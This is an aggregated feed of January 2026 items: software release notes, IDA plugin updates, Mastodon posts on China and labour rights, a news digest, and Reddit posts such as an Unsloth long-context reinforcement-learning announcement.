- ↔
- →
to read (pdf)
- Reconstructing Program Semantics from Go Binaries
- Long time ago, I was looking for game with some hidden rules, browsing random wi... | Hacker News
- Keychron’s Nape Pro turns your mechanical keyboard into a laptop‑style trackball rig: Hands-on at CES 2026 - Yanko Design
- The Code-Only Agent • Rijnard van Tonder
- Agent-native Architectures: How to Build Apps After Code Ends
- January 16, 2026
-
🔗 organicmaps/organicmaps 2026.01.16-8-android release
• NEW: Higher-contrast dark theme colors
• NEW: Google Assistant for navigation and search
• OSM map data as of January 11
• “Auto” navigation theme setting follows the system dark/light mode
• Thinner subway lines
• Search results show capacity for motorcycle parking, bicycle rental, bicycle charging, and car charging
• Show floor level in search results
• Albanian translations and TTS voice guidance
• Updated FAQ and app translations
• Fixed crashes
…more at omaps.org/newsSee a detailed announce on our website when app updates are published in all stores.
You can get automatic app updates from GitHub using Obtainium.sha256sum:
38bba983100c48d244032a133f95812ea3acb3009f56febe2de727e1033ea3a3 OrganicMaps-26011608-web-release.apk -
🔗 CERTCC/kaiju 260116 release
-
🔗 @cxiao@infosec.exchange seriously though not super happy with this, one reason why chinese cars are mastodon
seriously though not super happy with this, one reason why chinese cars are cheap is because they just ignore labour rights
but this whole thing is such a big sign of how the world has changed
-
🔗 @cxiao@infosec.exchange RE: mastodon
RE: https://flipboard.com/@cbcnews/edmonton-5aq1688az/-/a-bOcz2U73RIe79l8HT2IqJg%3Aa%3A107108217-%2F0
BRACE YOURSELF THE XIAOMI CAR IS COMING
-
🔗 3Blue1Brown (YouTube) The ladybug clock puzzle rss
This is the first in a set of monthly puzzles, curated by Peter Winkler. This one was originally suggested by Richard Stanley.
You can sign up to hear his description of the answer at http://momath.org/mindbenders
-
🔗 orhun/binsider Release v0.3.1 release
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +2 releases rss
sync repo: +1 plugin, +2 releases ## New plugins - [DeepExtract](https://github.com/marcosd4h/DeepExtractIDA) (0.0.6, 0.0.5) -
🔗 batrachianai/toad Different diff release
A different approach for diffs
[0.5.33] - 2027-01-16
Fixed
- Fixed character level diff highlights
-
🔗 Locklin on science Conditional probability: an educational defect in Physics didactics rss
Conditional probability is something physicists have a hard time with. There are a number of reasons I know this is true. Primarily I know it is true from my own experience: I had a high-middling to excellent didactics experience in physics, and was basically never exposed to the idea. When I got out into the […]
-
🔗 HexRaysSA/plugin-repository commits Merge pull request #18 from marcosd4h/feature/adding-deepextract-plugin rss
Merge pull request #18 from marcosd4h/feature/adding-deepextract-plugin -
🔗 Hex-Rays Blog Faster, More Responsive Tabular Views in IDA 9.3 rss
-
🔗 langchain-ai/deepagents deepagents-cli==0.0.13a2 release
Initial release
chore: bump deepagents-cli to 0.0.13a2 (#795)
docs: add testing readme (#788)
fix(cli): include tcss and py.typed in package data (#781)
feat(cli): format file tree with markdown (#782)
fix(cli): add explicit package inclusion for setuptools (#780)
add prompt seeding with -m flag (#755)
docs: update model configuration details inREADME(#772)
fix: import rules (#763)
release(deepagents-cli): 0.0.13a1 (#756)
cli-token-tracking-fixes (#706)
release: deepagents 0.3.6 (#752)
chore: automatically sort imports (#740)
Add LangSmith tracing status to welcome banner (#741)
feat(cli): inject local context into system prompt viaLocalContextMiddleware
fix: don't allow Rich markup from user content (#704)
fix(cli): remove duplicate version fromwelcome.py(#737)
feat(cli): add--version//versioncommands (#698)
minor release(deepagents): bump version to 0.3.5 (#695)
Port SDK Memory to CLI (#691)
fix thread id (#692)
chore(ci): add uv lock checks (#681)
update version bounds (#687)
CLI Refactor to Textual (#686)
Fix invalid YAML in skill-creator SKILL.md frontmatter (#675)
feat(deepagents): add skills to sdk (#591)
docs: replace gemini 1.5 (#653)
feat(cli): show version in splash screen (#610)
chore(cli): expose version (#609)
fix(cli): handle read_file offset exceeding file length by returning all lines (issue #559) (#568)
chore(cli): remove line (#601)
minor version bump, model setting, agent skill spec support, skill creator example (#600)
Comply with Anthropic Agent Skills spec (#592)
feat(cli): add --model flag with auto-detection (#584)
feat: add skill-creator skill with init and validation scripts (#579)
docs(cli): add LangSmith environment variables documentation (#583)
CLI release (#581)
feat(cli): add DEEPAGENTS_LANGSMITH_PROJECT configuration (#577)
feat: add ability to paste images in input (#555)
chore(harbor/cli): allow benchmarking with either cli or SDK (#542)
chore(cli): add comprehensive testing for sandbox operations (#501)
test make format (#483)
Update README to specify CLI (#490)
docs(cli): enhance README with comprehensive documentation (#489)
fix(cli): for now use non peristent implementation of shell (#488)
chore(cli): bump lock file (#487)
chore(cli): add end to end test to the cli (#482)
release(deepagents, cli) (#477)
Harrison/fix diffing (#478)
truncate glob (#473)
fix(cli): 2nd argument must be called runtime (not _runtime) (#472)
add file upload and download apis (#381)
chore(cli): other lints (#464)
feat: add option to disable splash on startup (#446)
chore(cli): pull out interrupt on config (#463)
Harrison/add gemini support (#456)
chore(cli): remove internal file that's not needed (#462)
chore(cli): apply auto-fixes for linting (#461)
chore(cli): quick linting fixes (#460)
chore(cli): remove hard-coded paths (#458)
cli: inherit env variables for cli (#459)
fix(deepagents-cli): fix linting (broke CI) (#457)
feat(cli): add project-level skills support (#439)
fix: localize key bindings and update tips for macOS compatibility (#451)
chore: cleanupmarkdownlinterrors inREADME.md(#447)
fix cli rendering (#445)
add auto accept option to CLI (#421)
Remove unnecessary dependencies fromdeepagentsmodule (#429)
fix: userequest.overrideinstead of direct attribute overrides (#431)
add missing type annotations (#425)
chore(deepagent-cli): remove double diff display (WIP) (#387)
Add skills and dual-scope memory to deepagents CLI (#315)
use thread id rather than hardcoding to main (#423)
release: deepagents 0.2.9, cli 0.0.9 (#411)
patch: remove resumable shell middleware (#410)
chore(cli): internal refactor and some unit tests for tool descriptions (#394)
Add simple benchmark tests (#395)
fix: remove temperature, not supported by some OpenAI models (o3) (#392)
release 0.0.8 deepagents-cli (#390)
release (#388)
clean up for HIL logic (#384)
chore: finish migration into monorepo structure (#383)
chore: clean up placeholder test file (#378)
feat(sandbox-protocol): introduce id property + restore missing traceback (#379)
chore: add simple integration tests (#377)
chore: carve out integration tests for CLI (#376)
chore: clean up some sandbox provider details (#375)
feat: sandbox protocol (#319)
chore: quick linting pass in cli (#349)
fix(cli): handle multiple concurrent interrupts in HITL workflow (#318)
feat(cli): add fetch_url tool for converting web content to markdown (#310)
ctrl-c protection, add buffer to avoid accidentally exiting thread (#300)
update message.text() to .text (#317)
release 0.2.5 (#306)
fix-cli(ui): show tool call running in spinner instead of hanging cursor (#305)
cli-update: make execute_task async, allows abort to work (#299)
fix (cli-ui): remove brittle/dead code for summarization tracking (#298)
fix (cli-ux): improved diff viewer (highlighting, line_nums, wrapping), fixed spacing nits on tool approval (#293)
ci: enable format lint (#292)
fix (cli): autocomplete for @ and / commands through directories, bash mode in TUI (#278)
chore: delete accidental file (#282)
handle hilt in a way that makes tracing better (#277)
simplify hilt (#276)
chore: add ci (#254)
move agent memory and bump (#249)
Revert "fix(cli): Abort functionality, autocomplete, and fixed memory prompts…" (#248)
fix(cli): Abort functionality, autocomplete, and fixed memory prompts (#246)
cr (#245)
fix(deepagents-cli): package the agent prompt correctly (#242)
release
ix(cli): Fix token counting bugs and improve clarity (#240)
release (#238)
Add deepagents cli scaffolding (#224) -
🔗 r/reverseengineering Drone Hacking Part 1: Dumping Firmware and Bruteforcing ECC rss
submitted by /u/Nightlark192
[link] [comments] -
🔗 badlogic/pi-mono v0.47.0 release
Breaking Changes
- Extensions using
Editordirectly must now passTUIas the first constructor argument:new Editor(tui, theme). Thetuiparameter is available in extension factory functions. (#732)
Added
- OpenAI Codex official support : Full compatibility with OpenAI's Codex CLI models (
gpt-5.1,gpt-5.2,gpt-5.1-codex-mini,gpt-5.2-codex). Features include static system prompt for OpenAI allowlisting, prompt caching via session ID, and reasoning signature retention across turns. SetOPENAI_API_KEYand use--provider openai-codexor select a Codex model. (#737) pi-internal://URL scheme in read tool for accessing internal documentation. The model can read files from the coding-agent package (README, docs, examples) to learn about extending pi.- New
inputevent in extension system for intercepting, transforming, or handling user input before the agent processes it. Supports three result types:continue(pass through),transform(modify text/images),handled(respond without LLM). Handlers chain transforms and short-circuit on handled. (#761 by @nicobailon) - Extension example:
input-transform.tsdemonstrating input interception patterns (quick mode, instant commands, source routing) (#761 by @nicobailon) - Custom tool HTML export: extensions with
renderCall/renderResultnow render in/shareand/exportoutput with ANSI-to-HTML color conversion (#702 by @aliou) - Direct filter shortcuts in Tree mode: Ctrl+D (default), Ctrl+T (no-tools), Ctrl+U (user-only), Ctrl+L (labeled-only), Ctrl+A (all) (#747 by @kaofelix)
Changed
- Skill commands (
/skill:name) are now expanded in AgentSession instead of interactive mode. This enables skill commands in RPC and print modes, and allows theinputevent to intercept/skill:namebefore expansion.
Fixed
- Editor no longer corrupts terminal display when loading large prompts via
setEditorText. Content now scrolls vertically with indicators showing lines above/below the viewport. (#732) - Piped stdin now works correctly:
echo foo | piis equivalent topi -p foo. When stdin is piped, print mode is automatically enabled since interactive mode requires a TTY (#708) - Session tree now preserves branch connectors and indentation when filters hide intermediate entries so descendants attach to the nearest visible ancestor and sibling branches align. Fixed in both TUI and HTML export (#739 by @w-winter)
- Added
upstream connect,connection refused, andreset before headerspatterns to auto-retry error detection (#733) - Multi-line YAML frontmatter in skills and prompt templates now parses correctly. Centralized frontmatter parsing using the
yamllibrary. (#728 by @richardgill) ctx.shutdown()now waits for pending UI renders to complete before exiting, ensuring notifications and final output are visible (#756)- OpenAI Codex provider now retries on transient errors (429, 5xx, connection failures) with exponential backoff (#733)
- Extensions using
-
🔗 @cxiao@infosec.exchange really good points here on transnational repression and labour rights too: mastodon
really good points here on transnational repression and labour rights too:
What is the relationship between dissent and protest in China and the security and prosperity of ordinary Americans?
A lot of the things that prompt dissent in China—from widespread labor rights violations to repression of ethnic minority groups—reflect consequences of the CCP systematically restricting rights like free expression and free association. We can already see the influence of this system expanding beyond China’s borders. For example, the CCP manipulates media in other countries and is the world’s worst perpetrator of transnational repression, when governments reach across borders to intimidate or attack exiles they perceive as a threat. Chinese companies import poor labor practices into the foreign countries where they work. This puts pressure on American companies to compete by lowering their labor standards. Thus CCP abuses can undermine people’s rights everywhere, including in the United States.
-
🔗 @cxiao@infosec.exchange RE: mastodon
RE: https://mstdn.social/@davidonformosa/115902246202411668
So many good bits in this interview:
The CDM team races every day to document protest activity on China’s social media sites before it is deleted. Depending on the topic and size of the event—and whether it goes viral—some posts may disappear in minutes.
-
- January 15, 2026
-
🔗 IDA Plugin Updates IDA Plugin Updates on 2026-01-15 rss
IDA Plugin Updates on 2026-01-15
New Releases:
- dylib_dobby_hook latest
- FeelingLucky v1.0.0
- foo v1.0.0
- HexLens Initial release
- ida-hcli v0.15.10
- ida-hcli v0.15.9
- idawilli v2026.01.15
- panda v1.8.81 @ refs/heads/dev
- sharingan v1.0.2
Activity:
- capa
- 5a5545aa: ghidra: fix unit tests (#2812)
- cpp03
- ee852c76: more function added
- dylib_dobby_hook
- FeelingLucky
- foo
- ghidra
- ghidra-chinese
- HappyIDA
- HexLens
- hrtng
- c743cc03: fix Unflattening loses blocks #47
- ida-domain
- ida-hcli
- idawilli
- MCP-IDA-PRO
- 3ff1d12b: v2.1.0: Standardize API parameter names for LLM compatibility
- msc-thesis-LLMs-to-rank-decompilers
- 004cfecd: edits pre mega-run, changed server to cuda
- panda
- rhabdomancer
- sharingan
- symless
- c0f8029f: Fix missing QRegExpValidator on IDA 9.2 (#49)
-
🔗 HexRaysSA/plugin-repository commits Request for adding DeepExtractIDA plugin rss
Request for adding DeepExtractIDA plugin -
🔗 r/wiesbaden Voi Parkverbots Eskalation rss
Ich nutze eigentlich gern die VOI Roller weil leichter, bessere Federung. Jetzt haben die aber über Nacht quasi überall Parkverbot aktiviert. Dott und Co. kann man nach wie vor an allen möglichen Stellen parken.
Ich hab immer auf dem nicht genutzten Fahrradabstellplatz an unserem Grundstück geparkt aber das ist jetzt auch im Voi Parkverbot, vermutlich weil es an einer Bushaltestelle liegt.
Das Bild zeigt die Ausmaße.
Jemand ne Ahnung was dahinter steckt, das die das so übertreiben.
submitted by /u/Key-Extent5735
[link] [comments] -
🔗 News Minimalist 🐢 NATO sends troops to Greenland + 10 more stories rss
In the last 3 days ChatGPT read 93562 top news stories. After removing previously covered events, there are 11 articles with a significance score over 5.5.

[5.6] Nato allies send troops to Greenland as Denmark calls for common defence —theguardian.com(+487)
Danish Prime Minister Mette Frederiksen declared Greenland’s defense a NATO- wide concern as European troops deploy to the territory following US President Donald Trump’s repeated threats to take the island.
Forces from France, Germany, Norway, and Sweden are arriving in Greenland to bolster security. This follows a contentious Washington meeting where US officials reiterated ambitions to acquire the territory, citing security concerns regarding potential Russian and Chinese influence in the Arctic.
Denmark will establish a permanent military presence alongside rotational NATO personnel. Prime Minister Frederiksen maintains Arctic defense is a collective responsibility, despite President Trump’s claims that Denmark cannot adequately protect the island.
[6.7] Apple partners with Google to enhance Siri with advanced AI —bbc.com(+64)
Apple has partnered with Google to integrate Gemini AI models into Siri and other services, a move marking a significant shift toward outsourcing foundational technology to its primary competitor.
Analysts say the deal brings requested AI features to consumers but highlights Apple's struggle to develop internal alternatives. Apple Intelligence will utilize Google's models while continuing to operate within Apple's private cloud system to ensure user data privacy remains a priority.
[6.7] Vagus nerve stimulator offers lasting relief for treatment-resistant depression —medicine.washu.edu(+8)
A WashU Medicine study found that implanted vagus nerve stimulation devices provide enduring relief for severe treatment-resistant depression, with improvements sustained for at least two years in most responders.
The multicenter RECOVER trial followed nearly 500 participants who previously failed an average of thirteen treatments. Results showed that over 80% of patients who improved after one year maintained those benefits, with 20% of all participants reaching full remission by month 24.
The ongoing study aims to secure federal insurance coverage for the therapy, which is currently cost-prohibitive. The device functions by sending calibrated electrical pulses to the brain via the left vagus nerve.
Highly covered news with significance over 5.5
[6.6] First UK patient receives pioneering CAR-T therapy for aggressive leukaemia — bbc.com (+4)
[6.3] US imposes tariffs on high-performance computer chips, China retaliates — tagesschau.de (German) (+20)
[6.2] China directs domestic firms to cease using US and Israeli cybersecurity software — rfi.fr (Chinese) (+7)
[5.9] Antarctic ice archive preserves climate records from melting glaciers — france24.com (+8)
[5.7] Wikipedia partners with Amazon and Microsoft to monetize content — apnews.com (+25)
[5.7] China's electric vehicle exports surged 104% in 2025 — scmp.com (+6)
[5.7] Ukraine begins first lithium extraction project at Kirovohrad Oblast deposit — rbc.ua (Ukrainian) (+4)
[5.5] OpenAI launches ChatGPT Translate, a new competitor to Google Translate — bleepingcomputer.com (+12)
Thanks for reading!
— Vadim
You can create your own personalized newsletter like this with premium.
-
🔗 r/wiesbaden Tax advisor rss
Hello all. I have been looking for a new tax advisor (since mine retired) for a while without success, as most of them are just not taking new clients. I need help in filing my own personal taxes (a bit complicated/nontraditional so the apps can't handle it) and setting up a new company (need advice on best structure, process, etc).
Does anyone have any tips on tax advisors in town that are open to taking on new clients?
submitted by /u/ExistentialRacoon
[link] [comments] -
🔗 batrachianai/toad Fix for Python REPL release
[0.5.32] - 2027-01-15
Fixed
- Fixed broken text form the input in commands
-
🔗 badlogic/pi-mono v0.46.0 release
Fixed
- Scoped models (
--modelsorenabledModels) now remember the last selected model across sessions instead of always starting with the first model in the scope (#736 by @ogulcancelik) - Show
bun installinstead ofnpm installin update notification when running under Bun (#714 by @dannote) /skillprompts now include the skill path (#711 by @jblwilliams)- Use configurable
expandToolskeybinding instead of hardcoded Ctrl+O (#717 by @dannote) - Compaction turn prefix summaries now merge correctly (#738 by @vsabavat)
- Avoid unsigned Gemini 3 tool calls (#741 by @roshanasingh4)
- Fixed signature support for non-Anthropic models in Amazon Bedrock provider (#727 by @unexge)
- Keyboard shortcuts (Ctrl+C, Ctrl+D, etc.) now work on non-Latin keyboard layouts (Russian, Ukrainian, Bulgarian, etc.) in terminals supporting Kitty keyboard protocol with alternate key reporting (#718 by @dannote)
Added
- Edit tool now uses fuzzy matching as fallback when exact match fails, tolerating trailing whitespace, smart quotes, Unicode dashes, and special spaces (#713 by @dannote)
- Support
APPEND_SYSTEM.mdto append instructions to the system prompt (#716 by @tallshort) - Session picker search: Ctrl+R toggles sorting between fuzzy match (default) and most recent; supports quoted phrase matching and
re:regex mode (#731 by @ogulcancelik) - Export
getAgentDirfor extensions (#749 by @dannote) - Show loaded prompt templates on startup (#743 by @tallshort)
- MiniMax China (
minimax-cn) provider support (#725 by @tallshort) gpt-5.2-codexmodels for GitHub Copilot and OpenCode Zen providers (#734 by @aadishv)
Changed
- Replaced
wasm-vipswith@silvia-odwyer/photon-nodefor image processing (#710 by @can1357) - Extension example:
plan-mode/shortcut changed from Shift+P to Ctrl+Alt+P to avoid conflict with typing capital P (#746 by @ferologics) - UI keybinding hints now respect configured keybindings across components (#724 by @dannote)
- CLI process title is now set to
pifor easier process identification (#742 by @richardgill)
- Scoped models (
-
🔗 langchain-ai/deepagents deepagents-cli==0.0.13a1 release
Initial release
release(deepagents-cli): 0.0.13a1 (#756)
cli-token-tracking-fixes (#706)
release: deepagents 0.3.6 (#752)
chore: automatically sort imports (#740)
Add LangSmith tracing status to welcome banner (#741)
feat(cli): inject local context into system prompt viaLocalContextMiddleware
fix: don't allow Rich markup from user content (#704)
fix(cli): remove duplicate version fromwelcome.py(#737)
feat(cli): add--version//versioncommands (#698)
minor release(deepagents): bump version to 0.3.5 (#695)
Port SDK Memory to CLI (#691)
fix thread id (#692)
chore(ci): add uv lock checks (#681)
update version bounds (#687)
CLI Refactor to Textual (#686)
Fix invalid YAML in skill-creator SKILL.md frontmatter (#675)
feat(deepagents): add skills to sdk (#591)
docs: replace gemini 1.5 (#653)
feat(cli): show version in splash screen (#610)
chore(cli): expose version (#609)
fix(cli): handle read_file offset exceeding file length by returning all lines (issue #559) (#568)
chore(cli): remove line (#601)
minor version bump, model setting, agent skill spec support, skill creator example (#600)
Comply with Anthropic Agent Skills spec (#592)
feat(cli): add --model flag with auto-detection (#584)
feat: add skill-creator skill with init and validation scripts (#579)
docs(cli): add LangSmith environment variables documentation (#583)
CLI release (#581)
feat(cli): add DEEPAGENTS_LANGSMITH_PROJECT configuration (#577)
feat: add ability to paste images in input (#555)
chore(harbor/cli): allow benchmarking with either cli or SDK (#542)
chore(cli): add comprehensive testing for sandbox operations (#501)
test make format (#483)
Update README to specify CLI (#490)
docs(cli): enhance README with comprehensive documentation (#489)
fix(cli): for now use non peristent implementation of shell (#488)
chore(cli): bump lock file (#487)
chore(cli): add end to end test to the cli (#482)
release(deepagents, cli) (#477)
Harrison/fix diffing (#478)
truncate glob (#473)
fix(cli): 2nd argument must be called runtime (not _runtime) (#472)
add file upload and download apis (#381)
chore(cli): other lints (#464)
feat: add option to disable splash on startup (#446)
chore(cli): pull out interrupt on config (#463)
Harrison/add gemini support (#456)
chore(cli): remove internal file that's not needed (#462)
chore(cli): apply auto-fixes for linting (#461)
chore(cli): quick linting fixes (#460)
chore(cli): remove hard-coded paths (#458)
cli: inherit env variables for cli (#459)
fix(deepagents-cli): fix linting (broke CI) (#457)
feat(cli): add project-level skills support (#439)
fix: localize key bindings and update tips for macOS compatibility (#451)
chore: cleanupmarkdownlinterrors inREADME.md(#447)
fix cli rendering (#445)
add auto accept option to CLI (#421)
Remove unnecessary dependencies fromdeepagentsmodule (#429)
fix: userequest.overrideinstead of direct attribute overrides (#431)
add missing type annotations (#425)
chore(deepagent-cli): remove double diff display (WIP) (#387)
Add skills and dual-scope memory to deepagents CLI (#315)
use thread id rather than hardcoding to main (#423)
release: deepagents 0.2.9, cli 0.0.9 (#411)
patch: remove resumable shell middleware (#410)
chore(cli): internal refactor and some unit tests for tool descriptions (#394)
Add simple benchmark tests (#395)
fix: remove temperature, not supported by some OpenAI models (o3) (#392)
release 0.0.8 deepagents-cli (#390)
release (#388)
clean up for HIL logic (#384)
chore: finish migration into monorepo structure (#383)
chore: clean up placeholder test file (#378)
feat(sandbox-protocol): introduce id property + restore missing traceback (#379)
chore: add simple integration tests (#377)
chore: carve out integration tests for CLI (#376)
chore: clean up some sandbox provider details (#375)
feat: sandbox protocol (#319)
chore: quick linting pass in cli (#349)
fix(cli): handle multiple concurrent interrupts in HITL workflow (#318)
feat(cli): add fetch_url tool for converting web content to markdown (#310)
ctrl-c protection, add buffer to avoid accidentally exiting thread (#300)
update message.text() to .text (#317)
release 0.2.5 (#306)
fix-cli(ui): show tool call running in spinner instead of hanging cursor (#305)
cli-update: make execute_task async, allows abort to work (#299)
fix (cli-ui): remove brittle/dead code for summarization tracking (#298)
fix (cli-ux): improved diff viewer (highlighting, line_nums, wrapping), fixed spacing nits on tool approval (#293)
ci: enable format lint (#292)
fix (cli): autocomplete for @ and / commands through directories, bash mode in TUI (#278)
chore: delete accidental file (#282)
handle hilt in a way that makes tracing better (#277)
simplify hilt (#276)
chore: add ci (#254)
move agent memory and bump (#249)
Revert "fix(cli): Abort functionality, autocomplete, and fixed memory prompts…" (#248)
fix(cli): Abort functionality, autocomplete, and fixed memory prompts (#246)
cr (#245)
fix(deepagents-cli): package the agent prompt correctly (#242)
release
ix(cli): Fix token counting bugs and improve clarity (#240)
release (#238)
Add deepagents cli scaffolding (#224) -
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +1 release, ~1 changed rss
sync repo: +1 plugin, +1 release, ~1 changed ## New plugins - [global-struct-dissector](https://github.com/williballenthin/idawilli) (0.1.0) ## Changes - [oplog](https://github.com/williballenthin/idawilli): - 0.2.0: archive contents changed, download URL changed -
🔗 r/LocalLLaMA 7x Longer Context Reinforcement Learning in Unsloth rss
| Hey r/LocalLlama! We're excited to show how Unsloth now enables 7x longer context lengths (up to 12x) for Reinforcement Learning! By using 3 new techniques we developed, we enable you to train gpt-oss 20b QLoRA up to 20K context on a 24Gb card - all with no accuracy degradation. Unsloth GitHub: https://github.com/unslothai/unsloth- For larger GPUs, Unsloth now trains gpt-oss QLoRA with 380K context on a single 192GB NVIDIA B200 GPU
- Qwen3-8B GRPO reaches 110K context on an 80GB VRAM H100 via vLLM and QLoRA, and 65K for gpt-oss with BF16 LoRA.
- Unsloth GRPO RL runs with Llama, Gemma & all models auto support longer contexts
Also, all features in Unsloth can be combined together and work well together:
- Unsloth's weight-sharing feature with vLLM and our Standby Feature in Memory Efficient RL
- Unsloth's Flex Attention for long context gpt-oss and our 500K Context Training
- Float8 training in FP8 RL and Unsloth's async gradient checkpointing and much more
You can read our educational blogpost for detailed analysis, benchmarks and more: https://unsloth.ai/docs/new/grpo-long-context And you can of course train any model using our new features and kernels via our free fine-tuning notebooks: https://docs.unsloth.ai/get-started/unsloth-notebooks Some free Colab notebooks below which has the 7x longer context support backed in: | gpt-oss-20b-GRPO.ipynb) GSPO Colab | Qwen3-VL-8B-Vision-GRPO.ipynb) Vision RL | Qwen3-8B - FP8 L4 GPU
---|---|---To update Unsloth to automatically make training faster, do:
pip install --upgrade --force-reinstall --no-cache-dir --no-deps unsloth pip install --upgrade --force-reinstall --no-cache-dir --no-deps unsloth_zooAnd to enable GRPO runs in Unsloth, do
import os os.environ["UNSLOTH_VLLM_STANDBY"] = "1" # Standby = extra 30% context lengths! from unsloth import FastLanguageModel import torch max_seq_length = 20000 # Can increase for longer reasoning traces lora_rank = 32 # Larger rank = smarter, but slower model, tokenizer = FastLanguageModel.from_pretrained( model_name = "unsloth/Qwen3-4B-Base", max_seq_length = max_seq_length, load_in_4bit = False, # False for LoRA 16bit fast_inference = True, # Enable vLLM fast inference max_lora_rank = lora_rank, )Hope you all have a great rest of the week and thank you!
submitted by /u/danielhanchen
[link] [comments] -
🔗 langchain-ai/deepagents deepagents==0.3.6 release
Changes since deepagents==0.3.5
chore: add tests for config, context, metadata propagation (#776)
fix: import rules (#763)
fix(deepagents): throw a clear exception message when 'messages' key missing from the output of the subagent (#678)
release: deepagents 0.3.6 (#752)
chore: automatically sort imports (#740)
fix: no f string needed (#750)
feat: add agent name when creating subagents (#735)
feat(cli): inject local context into system prompt viaLocalContextMiddleware
chore: update twitter URL (#727)
chore: CR on docstrings/readme (#722) -
🔗 HexRaysSA/plugin-repository commits sync repo: ~1 changed rss
sync repo: ~1 changed ## Changes - [oplog](https://github.com/williballenthin/idawilli): - 0.2.0: archive contents changed, download URL changed -
🔗 Kagi release notes Jan 15th, 2026 - New Year tune-up: smoother everything! rss
Kagi Search
Kagi Search Android app
We’ve made meaningful improvements to the Kagi Search app — faster performance, smoother overall experience. If you’re on Android, give the update a try.
We also hope this makes it even easier to share Kagi with the people you care about. Let us know what you think!
- Improved app startup time
- Updated search home screen with native text editing
- Updated home screen widgets with faster access to Translate, Summarize and Assistant
- Add settings to Kagi Search app to autofocus the search bar on launch and to move the search bar to the bottom #9042 @conradsrc
- Improvements/fixes to the Android app screenshots #5019 @Niraj
- Android app: Pressing Enter on a physical keyboard should search #8838 @ItsHarper
- Android app: image, news... etc don't stay selected in the first screen #7207 @Ronzino
- Android Share Menu: "Assistant" option appears twice, first instance should be labeled "Search" #8773 @artemp84
- Image Search With Camera #5032 @Wes
- Add voice search #3270 @Browsing6853
- Launching translate from the Android widget is very slow #8453 @zslayton
- Fixed login for Github connected accounts
Other fixes and improvements
- !word bang now directs to Kagi Translate Dictionary
- Toggle to Disable SlopStop #9105 @______nick (also adds settings around it though)
- While authenticating via privacy pass, you are unable to use any non-default lens #9510 @Sludge
- Trying to change rank status of a domain from Kagi's leaderboard isn't working as expected #9392 @Puddle
- Personalized Results page has Incorrect Link #9517 @catgirlinspace
- The
kagi.com/botpage is hard ro read #9511 @thekarel - Maintain 'annual' choice on pricing page when switching between Individual, Family, Team #9378 @keunes
- Translations spill over container in pricing page #9377 @keunes
- Link doesn't resolve to anything #9413 @onlineversioncontrolsystem
- Reverse image search not working correctly with text copied from Excel #8598 @bxd41
- Embed Google Maps Reviews alongside Yelp Reviews #4204 @mackid1993
Kagi Assistant
- We upgraded to GLM 4.7 (with thinking variant)
- Case-agnostic alphabetical sorting for tags #8967 @lolroger
- Make searching on/off more clear
- Special characters like German Umlaut (ä, ö, ü etc.) are broken when customizing Assistant #9501 @Felensis
- The first letter(s) of Grok 4 responses are cut #9484 @4fzx6
- Problem with unicode characters in assistant's output #9345 @chbug
- Kagi Assistant Thread Search Performance degradation (WebKit?) #9462 @tockrock
- Diacritics in filenames prevent document analysis #9361 @noquierouser
- Allow immediate typing when you load the Assistant #9401 @Thibaultmol-kagi
- Research (Experimental) can now generate and edit images
- Model selection window breaks into two lines in CJK languages #9032 @Hanbyeol
- Kagi Assistant: Renaming a thread does not allow you to select single words or characters in the thread name #8909 @__
- Assistant lens dropdown sometimes lights purple with no lens selected #9169 @howie
- Message info now includes timestamp of when the prompt was submitted
Kagi News
- Time Travel mode to access past daily summaries - available to all during beta, subscriber-only after
- Paywall indicator for paywalled domains
- Keyboart shortcuts for navigation do not work as expected @mr-f00
- Wide screen mode @xatier
- Added Estonian as UI language @Tarpsvo
- Heat index graph does not update when refreshing news from notification #9547 @ashemedai
- Allow user to set a universal reading level for category #9531 @cakeboss
- Ordering Sources List in Kagi News #9450 @catfriend
- Links to source articles should be actual links #9273 @r5x
Kagi News Apps (iOS and Android)
- Faster app launch and improved offline support
- Pull-to-refresh added to the feed
- Category settings now include search for easier discovery
- Sources section in story view now shows the number of publishers and articles
- Support for selecting multiple content languages, stories are automatically translated to your primary language when needed #8822 @LordDuckingling
- Exception messages are now localized for better clarity
- Improved image caching to reduce local storage usage
- Enhanced layout responsiveness on wide screens, including iPads and tablets
- General UI improvements across the app
Kagi Translate
- Help documentation redone (including detailed information about what you can do with URL paramters with Translate)
- Pinned languages and language history are now synced across devices if settings syncing is enabled
- Improved speech-to-text
- Background processing for document translations - start a job, switch tabs or close the browser, and download later
- Chinese localization tweaks @CTAO
- Alternatives button does not animate when only two characters are selected @CTAO
- No minimum text box size causes mobile view to become unusable below certain height #9499 @BenMacphail
- Japanese Input Issues on Mobile #9496 #9495 @TusedayGhost
- Clicking 'Show More' long romanicized text hides the box #9394 @theDoctor
- Alternative translation descriptions appear in target language #9431 @theDoctor
- Dictionary view pulls in other language tags and categories #9419 @ashemedai
- Duplicate language suggestions for "Detect Language" #9416 @dreifach
- Make buttons in Dictionary actual hyperlinks instead of js links #9408 @Thibaultmol
- Improve 'Dictionary sections' in Kagi Translate #9407 @Thibaultmol
- Document Wikitionary usage within Kagi Translate Dictionary #9405 @Thibaultmol
- Backdrop blur doesn't work in Safari on the translate pop-up controls @Carl
Kagi Maps
- Single clicking a city in maps doesn't do anything #9493 @CameronLittle
- Kagi maps doesn't show me the location linked to if I've given it location access #9492 @CameronLittle
- Extremely Distant Cafe & Restaurant Suggestions in Kagi Maps #9214 @Manipesto
- Maps Opening Hours Wrongly Shows Closed #9342 @Gredharm
- Maps Broken on Brave #9323 @Gredharm
Post of the week
Here is this week's featured social media mention:

We truly appreciate your support in spreading the word, so be sure to follow us and tag us in your comments!
2025: Year in Review
Explore the major updates, product launches, milestones and press highlights that defined last year for Kagi.

Windscribe partnership & privacy alliance

Kagi has partnered with Windscribe, Notesnook, Addy.io, and Ente to create a privacy-focused alliance. Read the announcement here, and check out our current Kagi Specials.
Kagi around the web
- Kagi News and Kagi Summarize are featured on a list of "incredible Android apps", check out the video review here.
- If you haven't yet, download Kagi News on iOS, Android, or view the web version, and grab Kagi Summarize on iOS or Android.
- Our video about Kagi Small Web is resonating with members. We talk about the purpose behind this initiative and why we're committed to growing it.
-
🔗 r/LocalLLaMA RTX 5070 Ti and RTX 5060 Ti 16 GB no longer manufactured rss
